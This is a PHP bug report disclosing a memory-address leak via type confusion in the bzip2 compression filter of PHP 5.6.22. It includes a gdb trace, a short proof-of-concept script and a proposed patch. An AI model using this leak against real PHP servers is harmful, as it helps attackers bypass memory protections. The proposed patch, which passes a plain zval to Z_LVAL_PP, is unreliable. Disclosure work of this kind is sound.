|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-06-18 17:37 UTC] gogil at stealien dot com
[2016-06-19 05:05 UTC] stas@php.net
-Type: Security
+Type: Bug
-Assigned To:
+Assigned To: sterling
[2016-06-19 05:05 UTC] stas@php.net
[2016-06-19 05:13 UTC] stas@php.net
[2016-06-19 05:13 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-06-22 05:58 UTC] krakjoe@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Nov 21 13:01:29 2024 UTC |
Description: ------------ Type Confusion vulnerability in php_bz2_filter_create() which leaking information. /php$ gdb --args php-5.6.22/sapi/cli/php poc.php Reading symbols from php-5.6.22/sapi/cli/php...done. (gdb) b bz2_filter.c:391 Breakpoint 1 at 0x5d49e1: file /php/php-5.6.22/ext/bz2/bz2_filter.c, line 391. (gdb) r Starting program: /php/php-5.6.22/sapi/cli/php poc.php Breakpoint 1, php_bz2_filter_create ( filtername=0x7ffff7eae8c0 "bzip2.compress", filterparams=0x7ffff7fc11c0, persistent=0) at /php/php-5.6.22/ext/bz2/bz2_filter.c:391 391 if (zend_hash_find(HASH_OF(filterparams), "blocks", sizeof("blocks"), (void**) &tmpzval) == SUCCESS) { (gdb) n 395 tmp = **tmpzval; (gdb) n 396 zval_copy_ctor(&tmp); (gdb) n 397 convert_to_long(&tmp); (gdb) n 398 if (Z_LVAL(tmp) < 1 || Z_LVAL(tmp) > 9) { (gdb) n 399 php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval)); <---------- Z_LVAL_PP macro is able to leaking memory address. (gdb) n Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (140737352754896) in /php/poc.php on line 6 (gdb) x/x 140737352754896 0x7ffff7eae6d0: 0x41414141 * Fix File ext/bz2/bz2_filter.c, line 391: if (zend_hash_find(HASH_OF(filterparams), "blocks", sizeof("blocks"), (void**) &tmpzval) == SUCCESS) { /* How much memory to allocate (1 - 9) x 100kb */ zval tmp; tmp = **tmpzval; zval_copy_ctor(&tmp); convert_to_long(&tmp); if (Z_LVAL(tmp) < 1 || Z_LVAL(tmp) > 9) { - php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval)); + php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmp)); } else { blockSize100k = Z_LVAL(tmp); } } Test script: --------------- <?php // poc.php $input = "AAAAAAAA"; $param = array('blocks' => $input); $fp = fopen('testfile', 'w'); stream_filter_append($fp, 'bzip2.compress', STREAM_FILTER_WRITE, $param); fclose($fp); ?> Expected result: ---------------- Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (0) Actual result: -------------- Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (140737352754896)